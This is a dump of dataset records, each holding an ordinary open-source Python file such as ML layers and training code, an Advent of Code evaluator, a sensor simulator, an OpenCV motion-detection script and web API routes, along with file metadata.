results = results + str(count) + \",\"\n\n results = results + str(precision_0) + \",\" + str(recall_0) + \",\" + str(f1score_0)\n results = results + \",\" + str(precision_1) + \",\" + str(recall_1) + \",\" + str(f1score_1) + \\\n \",\" + str(accuracy) + \"\\n\"\n\n print(classification_report(Y_test, predictions))\n\n count += 1\ntraining_log.write(results)\ntraining_log.flush()","sub_path":"WSU_SEAL/STRUDEL_CV.py","file_name":"STRUDEL_CV.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"646604545","text":"'''\nAuthor: Shuailin Chen\nCreated Date: 2021-09-30\nLast Modified: 2021-10-26\n\tcontent: \n'''\n\n\nmodel = dict(\n pretrained=None,\n backbone=dict(\n type='ResNetV1c',\n depth=18,\n in_channels=3,\n out_indices=[4], # x: stage-x + 1\n norm_cfg=dict(type='SyncBN'),\n # set output stride=8\n # dilations=(1, 1, 2, 4),\n # strides=(1, 2, 1, 1),\n ),\n)","sub_path":"configs/selfsup/_base_/models/r18-d32.py","file_name":"r18-d32.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"549988708","text":"from collections import defaultdict\nimport ast, operator\n\nwith open('in.txt') as f:\n lines = f.read().splitlines()\n\ndef visit(node):\n contents = []\n for _, value in ast.iter_fields(node):\n if isinstance(value, ast.AST):\n value = [value]\n if isinstance(value, list):\n contents.extend(visit(item) for item in value)\n\n return defaultdict(lambda: lambda: None, {\n 'Constant': lambda: node.value,\n 'Expr': lambda: contents[0],\n 
'Module': lambda: contents[0],\n 'BinOp': lambda: {\n 'Add': operator.add,\n 'Sub': operator.mul\n }[type(node.op).__name__](contents[0], contents[2])\n })[type(node).__name__]()\n\nvalues = []\nfor line in lines:\n line = line.translate(''.maketrans({'*': '-'}))\n values.append(visit(ast.parse(line)))\n\nprint(sum(values))\n","sub_path":"2020/18/18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"118615960","text":"# Copyright 2018 Red Hat, Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport logging\nimport os\nimport sys\n\nfrom paunch import constants\nfrom paunch import utils\n\n\ndef configure_logging(name, level=3, log_file=None):\n '''Mimic oslo_log default levels and formatting for the logger. '''\n log = logging.getLogger(name)\n\n if level and level > 2:\n ll = logging.DEBUG\n elif level and level == 2:\n ll = logging.INFO\n else:\n ll = logging.WARNING\n\n log.setLevel(ll)\n handler = logging.StreamHandler(sys.stderr)\n handler.setLevel(ll)\n if log_file:\n fhandler = logging.FileHandler(log_file)\n formatter = logging.Formatter(\n '%(asctime)s.%(msecs)03d %(process)d %(levelname)s '\n '%(name)s [ ] %(message)s',\n '%Y-%m-%d %H:%M:%S')\n fhandler.setLevel(ll)\n fhandler.setFormatter(formatter)\n log.addHandler(fhandler)\n log.addHandler(handler)\n log.propagate = False\n\n return log\n\n\ndef configure_logging_from_args(name, app_args):\n # takes 1, or 2 if --verbose, or 4 - 5 if --debug\n log_level = (app_args.verbose_level +\n int(app_args.debug) * 3)\n\n # if executed as root log to specified file or default log file\n if os.getuid() == 0:\n log_file = app_args.log_file or constants.LOG_FILE\n else:\n log_file = app_args.log_file\n\n log = utils.common.configure_logging(\n __name__, log_level, log_file)\n return (log, log_file, log_level)\n","sub_path":"paunch/utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"395020791","text":"import tensorflow as tf\nfrom tensorflow import keras\n\ndef Bottle_block2(filters=1, inputs=None):\n x = keras.layers.Conv2D(filters=filters, kernel_size=3, strides=1, padding='same')(inputs)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.Activation('relu')(x)\n x = keras.layers.Conv2D(filters=filters, kernel_size=3, strides=1, padding='same')(x)\n x = keras.layers.BatchNormalization()(x)\n shortcut = inputs\n x = keras.layers.add([shortcut, x])\n x = keras.layers.Activation('relu')(x)\n return x\n\n\ndef Bottle_block2t(filters=1, inputs=None):\n x = keras.layers.Conv2D(filters=filters, kernel_size=3, strides=1, padding='same')(inputs)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.Activation('relu')(x)\n x = keras.layers.Conv2D(filters=filters, kernel_size=3, strides=1, padding='same')(x)\n x = keras.layers.BatchNormalization()(x)\n 
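# unlike Bottle_block2 above, the shortcut here is a 1x1 conv projection, so the residual add\n    # still works when the input channel count differs from 'filters'\n    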
shortcut = keras.layers.Conv2D(filters=filters, kernel_size=1, strides=1, padding='same')(inputs)\n x = keras.layers.add([shortcut, x])\n x = keras.layers.Activation('relu')(x)\n return x\n\n\ndef Bottle_block3(filters, inputs, stride=1, downsample=None):\n expansion = 4\n x = keras.layers.Conv2D(filters=filters, kernel_size=1, strides=1, padding='same', kernel_regularizer=keras.regularizers.l2(0.0005))(inputs)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.Activation('relu')(x)\n x = keras.layers.Conv2D(filters=filters, kernel_size=3, strides=stride, padding='same', kernel_regularizer=keras.regularizers.l2(0.0005))(x)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.Activation('relu')(x)\n x = keras.layers.Conv2D(filters=filters * expansion, kernel_size=1, strides=1, padding='same', kernel_regularizer=keras.regularizers.l2(0.0005))(x)\n x = keras.layers.BatchNormalization()(x)\n if downsample:\n shortcut = downsample(inputs)\n else:\n shortcut = inputs\n x = keras.layers.add([shortcut, x])\n # x = keras.layers.Activation('relu')(x)\n return x\n\n\n# Center layer, described in \"A Discriminative Feature Learning Approach for Deep Face Recognition\"\nclass Center(keras.layers.Layer):\n def __init__(self, output_dim, **kwargs):\n self.output_dim = output_dim\n super(Center, self).__init__(**kwargs)\n\n def build(self, input_shape):\n center_shape = tf.TensorShape((input_shape[1], self.output_dim))\n self.center = self.add_weight(name='center',\n shape=center_shape,\n initializer='uniform',\n trainable=True)\n super(Center, self).build(input_shape)\n\n def call(self, inputs, *args, **kwargs):\n center = tf.reshape(self.center[:, 0], [1, inputs.shape[1]])\n diff = tf.reshape(tf.square(tf.norm(inputs - center, axis=1)), [-1, 1])\n for m in range(1, self.output_dim):\n center_m = tf.reshape(self.center[:, m], [1, inputs.shape[1]])\n diff_m = tf.reshape(tf.square(tf.norm(inputs - center_m, axis=1)), [-1, 1])\n diff = tf.concat([diff, diff_m], axis=1)\n return diff\n\n def compute_output_shape(self, input_shape):\n shape = tf.TensorShape((input_shape[0], self.output_dim))\n return shape\n\n\n# Euclid layer, calculate the distance between feature and centers\n# Now it works, but result is bad\nclass Euclid(keras.layers.Layer):\n def __init__(self, output_dim, **kwargs):\n self.output_dim = output_dim\n super(Euclid, self).__init__(**kwargs)\n\n def build(self, input_shape):\n kernel_shape = tf.TensorShape((self.output_dim, input_shape[1]))\n self.kernel = self.add_weight(name='center_kernel',\n shape=kernel_shape,\n initializer='uniform',\n trainable=True)\n super(Euclid, self).build(input_shape)\n\n def call(self, inputs, *args, **kwargs):\n kernels = tf.expand_dims(self.kernel, axis=0)\n features = tf.expand_dims(inputs, axis=1)\n diff1 = tf.reshape(tf.reduce_sum(tf.squared_difference(kernels, features), axis=2), [-1, self.output_dim])\n # diff1 = tf.reshape(tf.reduce_sum(tf.math.abs(kernels - features), axis=2), [-1, self.output_dim])\n diff_min = []\n for m in range(self.output_dim):\n center_m = tf.reshape(self.kernel[m], shape=[1, -1])\n diff_m = tf.reduce_sum(tf.squared_difference(self.kernel, center_m), axis=1)\n # diff_m = tf.reduce_sum(tf.math.abs(self.kernel - center_m), axis=1)\n diff_m = tf.concat([diff_m[:m], diff_m[m+1:]], axis=0)\n diff_m = diff_m[tf.math.argmin(diff_m)]\n diff_min.append(diff_m)\n diff_min = tf.reshape(tf.convert_to_tensor(diff_min), shape=[1, -1])\n inter_diff = tf.reduce_mean(diff_min)\n zeros = tf.zeros(shape=[tf.shape(inputs)[0], 
1])\n        inter_diff = zeros + inter_diff\n        return tf.concat([diff1, inter_diff], axis=1)\n        # return diff1, inter_diff\n\n    def compute_output_shape(self, input_shape):\n        shape = tf.TensorShape((input_shape[0], self.output_dim))\n        return shape\n\n# Identity_init for custom layer's kernel init\ndef Identity_init(shape, dtype=tf.float32, *args, **kwargs):\n    row = tf.cast(shape[0], dtype=tf.int32)\n    col = tf.cast(shape[1], dtype=tf.int32)\n    return tf.eye(row, col, dtype=dtype)\n\n\nclass Euclid2(keras.layers.Layer):\n    def __init__(self, output_dim, **kwargs):\n        self.output_dim = output_dim\n        super(Euclid2, self).__init__(**kwargs)\n\n    def build(self, input_shape):\n        kernel_shape = tf.TensorShape([self.output_dim, input_shape[1]])\n        t_shape = tf.TensorShape([input_shape[1], input_shape[1]])\n        self.kernel = self.add_weight(name='center_kernel',\n                                      shape=kernel_shape,\n                                      initializer='uniform',\n                                      trainable=True)\n        self.T = self.add_weight(name='M_transform',\n                                 shape=t_shape,\n                                 initializer=Identity_init,\n                                 trainable=True)\n        super(Euclid2, self).build(input_shape)\n\n    def call(self, inputs, *args, **kwargs):\n        batch_size = tf.shape(inputs)[0]\n        kernels = tf.expand_dims(self.kernel, axis=0)\n        features = tf.expand_dims(inputs, axis=1)\n        T = tf.expand_dims(tf.matmul(self.T, self.T, transpose_b=True), axis=0)\n        Ts = tf.tile(T, multiples=[batch_size, 1, 1])\n        substract = features - kernels\n        dis = tf.matmul(substract @ Ts, substract, transpose_b=True)\n        out = tf.linalg.diag_part(dis)\n        inter_mean = []\n        for m in range(self.output_dim):\n            sub = self.kernel - self.kernel[m]\n            inter = tf.linalg.diag_part(tf.matmul(sub @ self.T, sub, transpose_b=True))\n            inter_m = tf.concat([inter[:m], inter[m + 1:]], axis=0)\n            inter_m = inter_m[tf.math.argmin(inter_m)]\n            inter_mean.append(inter_m)\n            # inter_mean.append(tf.reduce_mean(inter_m * params))\n        inter_mean = tf.reshape(inter_mean, shape=[1, -1])\n        params = tf.math.softmax(-1 * inter_mean)\n        inter_diff = tf.tile(tf.reshape(tf.reduce_mean(inter_mean * params), shape=[1, 1]), multiples=[batch_size, 1])\n        return tf.concat([out, inter_diff], axis=1)\n\n    def compute_output_shape(self, input_shape):\n        shape = tf.TensorShape((input_shape[0], self.output_dim + 1))\n        return shape\n\n\nclass Arc_Logit(keras.layers.Layer):\n    def __init__(self, output_dim, m, **kwargs):\n        self.output_dim = output_dim\n        self.m = m\n        super(Arc_Logit, self).__init__(**kwargs)\n\n    def build(self, input_shape):\n        kernel_shape = tf.TensorShape((input_shape[1], self.output_dim))\n        self.kernel = self.add_weight(name='kernel',\n                                      shape=kernel_shape,\n                                      initializer=tf.initializers.random_normal,\n                                      trainable=True)\n        self.scale = self.add_weight(name='scale',\n                                     shape=(),\n                                     initializer=tf.initializers.zeros,\n                                     regularizer=keras.regularizers.l2(5.),\n                                     trainable=True)\n        self.margin = self.add_weight(name='margin',\n                                      shape=(),\n                                      initializer=tf.initializers.zeros,\n                                      # regularizer=keras.regularizers.l2(5.),\n                                      trainable=True)\n        super(Arc_Logit, self).build(input_shape)\n\n    def call(self, inputs, *args, **kwargs):\n        kernels = tf.math.l2_normalize(self.kernel, axis=0, epsilon=1e-9)\n        features = tf.math.l2_normalize(inputs, axis=1, epsilon=1e-9)\n        cos_theta = tf.matmul(features, kernels)\n        logits1 = 3.1 * cos_theta\n        # acos must see the raw cosine in [-1, 1]; taking acos of the scaled logits would produce NaNs\n        theta = tf.math.acos(tf.clip_by_value(cos_theta, -1.0 + 1e-7, 1.0 - 1e-7))\n        theta_m = theta + self.margin\n        logits2 = 3.1 * tf.math.cos(theta_m)\n        logits = tf.concat([logits1, logits2], axis=1)\n        return logits\n\n    def compute_output_shape(self, input_shape):\n        shape = tf.TensorShape((input_shape[0], self.output_dim * 2))\n        return shape\n\n\nclass 
Dense_regu(keras.layers.Layer):\n    def __init__(self, output_dim, **kwargs):\n        self.output_dim = output_dim\n        super(Dense_regu, self).__init__(**kwargs)\n\n    def build(self, input_shape):\n        shape = tf.TensorShape((input_shape[1], self.output_dim))\n        self.kernel = self.add_weight(name='kernel',\n                                      shape=shape,\n                                      initializer=keras.initializers.random_normal,\n                                      trainable=True)\n        super(Dense_regu, self).build(input_shape)\n\n    def call(self, inputs, *args, **kwargs):\n        T_mode = tf.reshape(tf.reduce_sum(tf.square(self.kernel), axis=0), shape=[1, -1])\n        T = self.kernel / tf.sqrt(T_mode)\n        # normalize each sample (row); reshape to [-1, 1] so the division broadcasts per row\n        feature_mode = tf.reshape(tf.reduce_sum(tf.square(inputs), axis=1), shape=[-1, 1])\n        feature = inputs / tf.sqrt(feature_mode)\n        logits = tf.matmul(feature, T)\n        inner_mul = tf.matmul(T, T, transpose_a=True)\n        # boolean mask of the strictly upper triangle; a mask built from zeros would select nothing\n        up_tri = tf.cast(tf.linalg.band_part(tf.ones(shape=[self.output_dim, self.output_dim]),\n                                             num_lower=0, num_upper=-1) - tf.eye(self.output_dim), tf.bool)\n        inner_ang = tf.boolean_mask(inner_mul, up_tri)\n        params = tf.math.softmax(-1 * inner_ang)\n        inter_diff = tf.tile(tf.reshape(tf.reduce_mean(inner_ang * params), shape=[1, 1]),\n                             multiples=[tf.shape(inputs)[0], 1])\n        return tf.concat([logits, inter_diff], axis=1)\n\n    def compute_output_shape(self, input_shape):\n        shape = tf.TensorShape((input_shape[0], self.output_dim + 1))\n        return shape\n","sub_path":"models/custom_layers.py","file_name":"custom_layers.py","file_ext":"py","file_size_in_byte":10986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231854117","text":"\"\"\"\n    Write a method to return all subsets of a set\n    O(n.2**n)\n\"\"\"\n\ndef getAllSets(S):\n    S = list(S)\n    n = len(S)\n    subsets = []\n    for i in range(1 << n):\n        subset = []\n        for j in range(n):\n            if i & (1 << j):\n                subset.append(S[j])\n        subsets.append(subset)\n    assert len(subsets) == 2**n\n    return subsets\n\nif __name__ == \"__main__\":\n    S = set([1, 2, 3])\n    print(getAllSets(S))","sub_path":"Chapter08/08_04_PowerSet_NaiveBinary.py","file_name":"08_04_PowerSet_NaiveBinary.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"367585586","text":"from connection import *\nimport connection, threading, socket\nfrom datetime import datetime\n\nvalue = -1\n\nhumidityTimes = {}\n\nwith open(SOURCE_FILE, mode='r+') as csv_file:\n    for row in csv_file:\n        if (row.split(',')[3] == '\\n'):\n            humidityTimes[row.split(',')[1]] = 'error'\n            continue\n        humidityTimes[row.split(',')[1]] = row.split(',')[3]\n\n\ndef parseTemp(text):\n    res = \"\"\n    for i in text:\n        if i.isnumeric() or i == '.' 
or i == '-':\n res += i\n return float(res)\n\n\ndef findInitialValue():\n global value\n foundFirst = False\n initialTime = datetime.strptime(datetime.now().strftime(\"%#H:%M:%S\"),\n \"%H:%M:%S\")\n for time in humidityTimes:\n if humidityTimes[time] != \"error\":\n temp = datetime.strptime(time, \"%H:%M:%S\")\n if foundFirst:\n if (temp > initialTime):\n break\n else:\n value = parseTemp(humidityTimes[time])\n else:\n if temp < initialTime:\n foundFirst = True\n\n\ndef getValue():\n global value\n while (True):\n try:\n time = datetime.now().strftime(\"%#H:%M:%S\")\n newValue = humidityTimes[time]\n if newValue != \"error\":\n value = parseTemp(newValue)\n except:\n pass\n sleep(1)\n\n\ndef sendData():\n global i\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n while True:\n if connection.CONNECTED:\n if value != -1:\n sock.sendto(\n bytes(\n \"{\\\"SN\\\": \\\"\" + SERIAL_NUMBER + \"\\\",\\\"nickname\\\":\\\"\" +\n connection.NICKNAME +\n \"\\\",\\\"measure\\\": \\\"HUM\\\", \\\"value\\\":\" + str(value) +\n \"}\", \"utf-8\"), (\"255.255.255.255\", 5005))\n print(\"{\\\"SN\\\": \\\"\" + SERIAL_NUMBER +\n \"\\\",\\\"measure\\\": \\\"HUM\\\", \\\"value\\\":\" + str(value) + \"}\")\n sleep(5)\n\n\nfindInitialValue()\n\ncheckConnection = threading.Thread(target=waitForConnection)\nsender = threading.Thread(target=sendData)\ngetData = threading.Thread(target=getValue)\n\ngetData.start()\ncheckConnection.start()\nsender.start()\n\nwhile True:\n sleep(1)\n","sub_path":"insideSensors/humidity-sensor.py","file_name":"humidity-sensor.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"483313166","text":"\"\"\"\nutils\n\"\"\"\nimport torch\nimport torchvision.datasets as dsets\nimport torchvision.transforms as transforms\n\ntransform = transforms.Compose([\n transforms.Resize(128),\n transforms.ToTensor(),\n])\n\n\ndef load_data_stl10(batch_size=64, test=False):\n if not test:\n train_dset = dsets.STL10(root='./data', split='train', transform=transform, download=True)\n else:\n train_dset = dsets.STL10(root='./data', split='test', transform=transform, download=True)\n train_loader = torch.utils.data.DataLoader(train_dset, batch_size=batch_size, shuffle=True)\n print(\"LOAD DATA, %d\" % (len(train_loader)))\n return train_loader\n\ndef load_data_cifar(batch_size=64):\n train_dset = dsets.CIFAR10(root='./data', train=True, transform=transform, download=True)\n train_loader = torch.utils.data.DataLoader(train_dset, batch_size=batch_size, shuffle=True)\n print(\"LOAD DATA, %d\" % len(train_loader))\n return train_loader\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"298822277","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 22 09:44:47 2020\n\n@author: Akash Kaushik\n\"\"\"\n\ndef user_input():\n \n number = \"wrong\"\n \n while number.isdigit() == False:\n number = input(\"Enter the Natural Number:\")\n \n return int(number)\n\nnum = user_input()\n\ndef sum_natural(num):\n sum1 = 0\n for i in range(1, num+1):\n a = i*i\n sum1 = sum1 + a\n \n return sum1\n\nb = sum_natural(num)\n\nprint(\"Sum of \", num, \"natural number is\", b)","sub_path":"Python Program for Sum of squares of first n natural 
numbers.py","file_name":"Python Program for Sum of squares of first n natural numbers.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"301936826","text":"import sys\nimport os\nfrom zipfile import ZipFile\nimport shutil\n\n\ndef unzip(file_path):\n myzip = ZipFile(file_path)\n for name in myzip.namelist():\n filename = name.encode('cp437').decode('gbk')\n myzip.extract(name)\n #os.chdir(file_path)\n try:\n os.rename(name, filename)\n\n except FileExistsError:\n os.remove(filename)\n os.rename(name, filename)\n\n\ndef copy_all(source, destination):\n z1 = destination\n\n for root, dir1, files1 in os.walk(source):\n for o1 in dir1:\n full_dirs = os.path.join(root, o1)\n relative_paths = full_dirs.replace(source, '')\n current_dirs = z1 + relative_paths\n try:\n os.makedirs(current_dirs)\n except FileExistsError:\n pass\n\n now_dirs = z1 + root.replace(source, '')\n for t0 in files1:\n shutil.copy(os.path.join(root, t0), now_dirs + '/' + t0)\n\n\ndef write_pythonpath(dir_path):\n dirs = [x for x in sys.path if x.endswith('site-packages')]\n if os.path.exists(dirs[0]+'/a.pth'):\n pass\n else:\n print('正在解压依赖包')\n unzip('site-packages.zip')\n print('正在复制依赖包')\n copy_all('site-packages', dirs[0])\n from testing_remove_line import change_line_py\n jc = dirs[0].replace('\\\\','\\\\\\\\')\n change_line_py(dirs[0]+'/ffmpy3.py', 52, ' def __init__(self, executable=\\''+jc + '\\\\\\\\ffmpeg.exe\\', global_options=None, inputs=None, outputs=None):\\n')\n with open(dirs[0]+'/a.pth', 'w', encoding='utf-8') as f:\n\n f.write(dir_path+'bilibili/\\n')\n f.write(dir_path+'bilibili/bilibili/spiders/\\n')\n","sub_path":"pythonfromroot/refer2.py","file_name":"refer2.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"340015456","text":"#!/usr/bin/env python\n# import requests\nimport re, sys\nimport pandas as pd\n\n\n\nif __name__ == '__main__':\n\n f = open('raw_target_data_url.txt', 'r')\n raw_data = f.read()\n f.close()\n data_rows = raw_data.split('\\n')\n\n #file_label, species_label, audio_id, url\n #make a list of dictionaries with those keys and turn into a dataframe then csv it to file\n df_list = []\n counter = len(data_rows)\n\n count = 0\n while (count= width:\n x = width - half - 1\n\n if x < half:\n x = half\n\n if y + half >= height:\n y = height - half - 1\n\n if y < half:\n y = half\n\n return img[y - half : y + half + 1, x - half : x + half + 1]\n\n# Implement the search algorithm called three step search, used to find the similar block among two frames\ndef ThreeStepSearch(currentSub, previous, center, S, blocksize):\n\n if S < 1:\n return center\n\n itself = (int(center[0]), int(center[1]))\n itselfSubimg = getSubImage(previous, itself, blocksize)\n\n top = (int(center[0]- S), int(center[1]))\n topsubimg = getSubImage(previous, top, blocksize)\n\n bottom = (int(center[0] + S), int(center[1]))\n b_subimg = getSubImage(previous, bottom, blocksize)\n\n left = (int(center[0]), int(center[1] - S))\n l_subimg = getSubImage(previous, left, blocksize)\n\n right = (int(center[0]), int(center[1] + S))\n r_subimg = getSubImage(previous, right, blocksize)\n\n topleft = (int(center[0] - S), int(center[1] - S))\n tl_subimg = getSubImage(previous, topleft, blocksize)\n\n topright = (int(center[0] - S), int(center[1] + S))\n tr_subimg = getSubImage(previous, topright, blocksize)\n\n bottomleft = (int(center[0] + 
S), int(center[1] - S))\n    bl_subimg = getSubImage(previous, bottomleft, blocksize)\n\n    bottomright = (int(center[0] + S), int(center[1] + S))\n    br_subimg = getSubImage(previous, bottomright, blocksize)\n\n    rIt = MAD(currentSub, itselfSubimg)\n\n    rTop = MAD(currentSub, topsubimg)\n\n    rBot = MAD(currentSub, b_subimg)\n\n    rL = MAD(currentSub, l_subimg)\n\n    rR = MAD(currentSub, r_subimg)\n\n    rTL = MAD(currentSub, tl_subimg)\n\n    rTR = MAD(currentSub, tr_subimg)\n\n    rBL = MAD(currentSub, bl_subimg)\n\n    rBR = MAD(currentSub, br_subimg)\n\n    sequence = (itself, top, bottom, left, right, topleft, topright, bottomleft, bottomright)\n\n    result = (rIt, rTop, rBot, rL, rR, rTL, rTR, rBL, rBR)\n\n    idx = result.index(min(result))\n\n    center = sequence[idx]\n\n    S = S / 2\n\n    return ThreeStepSearch(currentSub, previous, center, S, blocksize)\n\n# Another search method: exhaustively check every block within a limited radius\n# Below, the radius is 3 (offsets -3..3)\ndef neighborblock(currentSub, previous, center,block_size):\n\n    min_center = None\n    min_dis = 10000\n\n    for y in range (-3,4):\n        for x in range(-3,4):\n            temp_center = (center[0] + y, center[1] + x)\n\n            tempSub = getSubImage(previous, temp_center, block_size)\n\n            temp_val = MAD(currentSub, tempSub)\n\n            if (temp_val < min_dis):\n                min_dis = temp_val\n                min_center = temp_center\n\n    return min_center, min_dis\n\n\n# Extract each frame of the video and store it in the folder for further comparison\n\ncount = 0\n\nwhile(1):\n    ret, frame = cap.read()\n\n    if not ret:\n        print(\"Video reached end\")\n        break;\n\n\n    cv2.imwrite(\"img/frame%d.tif\" % count, frame)\n\n    cv2.imshow(\"Monkey Frame\", frame)\n\n    count = count + 1\n\n    if cv2.waitKey(30) & 0xff == ord('q'):\n        break\n\ncap.release()\ncv2.destroyAllWindows()\n\n\ncount_pre = 0\ncount_cur = 1\n\n# Get the previous and current frame and store the modified frame into a folder\n\nwhile (1):\n\n    previous = cv2.imread(\"img/frame%d.tif\" % count_pre)\n\n    current = cv2.imread(\"img/frame%d.tif\" % count_cur)\n\n    modify = np.copy(current)\n\n    if previous is None:\n        print(\"Previous Frame is not found\")\n        break\n\n    if current is None:\n        print(\"Current Frame is not found\")\n        break\n\n    for y in range (0, frame_height, block_size):\n        for x in range (0, frame_width, block_size):\n\n            center = (y + int(block_size/2), x + int(block_size/2))\n\n            currentsunImg = getSubImage(current, center, block_size)\n\n            # Using Search radius block Search algorithm\n            # displacement_center, difference = neighborblock(currentsunImg, previous, center, block_size)\n\n            # Three Step Search algorithm\n            displacement_center = ThreeStepSearch(currentsunImg, previous, center, 4, block_size)\n\n            displacementImg = getSubImage(previous, displacement_center, block_size)\n\n            difference = MAD(currentsunImg, displacementImg)\n\n            if difference > 60:\n                modify[center[0], center[1]] = [255, 255, 255]\n\n\n    # used to add the boundary to the object that moves most.\n\n    kernel = np.ones((10, 10), np.uint8)\n\n    dilation = cv2.dilate(modify, kernel, iterations = 3)\n\n    closing = cv2.morphologyEx(dilation, cv2.MORPH_CLOSE, kernel)\n\n    closing = cv2.cvtColor(closing, cv2.COLOR_BGR2GRAY)\n\n    ret, binary = cv2.threshold(closing, 240, 255, cv2.THRESH_BINARY)\n\n\n    im_back, contours, hierarchy = cv2.findContours(binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n    cv2.drawContours(modify, contours, -1, (255, 255, 255), 1)\n\n    cv2.imshow(\"Modify\", modify)\n\n    print(\"Center: \", center[0], \" x \", center[1])\n    print(\"Difference\", difference)\n\n    
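# save the annotated frame; the writer loop at the end of the script stitches these into the output video\n    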
cv2.imwrite(\"boundary/frame%d.tif\" % count_pre, modify)\n\n count_pre = count_pre + 1\n\n count_cur = count_cur + 1\n\n if cv2.waitKey(30) & 0xff == ord('q'):\n break\n\n# Output the video based on the frame that stored previously.\nmaker = 0\nout = cv2.VideoWriter('Boudary_demo.avi', cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 10, (int(frame_width), int(frame_height)))\nwhile(1):\n img = cv2.imread('boundary/frame%d.tif' % maker)\n if img is None:\n break;\n\n out.write(img)\n maker = maker + 1\nout.release()\ncv2.destroyAllWindows()\n\n\n\n\n","sub_path":"motion-detection/LabSubmission.py","file_name":"LabSubmission.py","file_ext":"py","file_size_in_byte":7616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"59084659","text":"import asyncio\n\nfrom aiohttp import web\n\nimport virtool.db.utils\nimport virtool.history.db\nimport virtool.history.utils\nimport virtool.http.routes\nimport virtool.otus.db\nimport virtool.otus.isolates\nimport virtool.otus.sequences\nimport virtool.otus.utils\nimport virtool.references.db\nimport virtool.references.utils\nimport virtool.utils\nimport virtool.validators\nfrom virtool.api.response import bad_request, insufficient_rights, json_response, no_content, not_found\n\nSCHEMA_VALIDATOR = {\n \"type\": \"list\",\n \"validator\": virtool.validators.has_unique_segment_names,\n \"schema\": {\n \"type\": \"dict\",\n \"allow_unknown\": False,\n \"schema\": {\n \"name\": {\"type\": \"string\", \"required\": True},\n \"required\": {\"type\": \"boolean\", \"default\": True},\n \"molecule\": {\"type\": \"string\", \"default\": \"\", \"allowed\": [\n \"\",\n \"ssDNA\",\n \"dsDNA\",\n \"ssRNA\",\n \"ssRNA+\",\n \"ssRNA-\",\n \"dsRNA\"\n ]}\n }\n }\n}\n\nroutes = virtool.http.routes.Routes()\n\n\n@routes.get(\"/api/otus\")\nasync def find(req):\n \"\"\"\n Find otus.\n\n \"\"\"\n db = req.app[\"db\"]\n\n term = req[\"query\"].get(\"find\")\n verified = req[\"query\"].get(\"verified\")\n names = req[\"query\"].get(\"names\", False)\n\n data = await virtool.otus.db.find(\n db,\n names,\n term,\n req[\"query\"],\n verified\n )\n\n return json_response(data)\n\n\n@routes.get(\"/api/otus/{otu_id}\")\nasync def get(req):\n \"\"\"\n Get a complete otu document. Joins the otu document with its associated sequence documents.\n\n \"\"\"\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n\n complete = await virtool.otus.db.join_and_format(db, otu_id)\n\n if not complete:\n return not_found()\n\n return json_response(complete)\n\n\n@routes.post(\"/api/refs/{ref_id}/otus\", schema={\n \"name\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"empty\": False,\n \"required\": True\n },\n \"abbreviation\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"default\": \"\"\n },\n \"schema\": SCHEMA_VALIDATOR\n})\nasync def create(req):\n \"\"\"\n Add a new otu to the collection. Checks to make sure the supplied otu name and abbreviation are not already in\n use in the collection. 
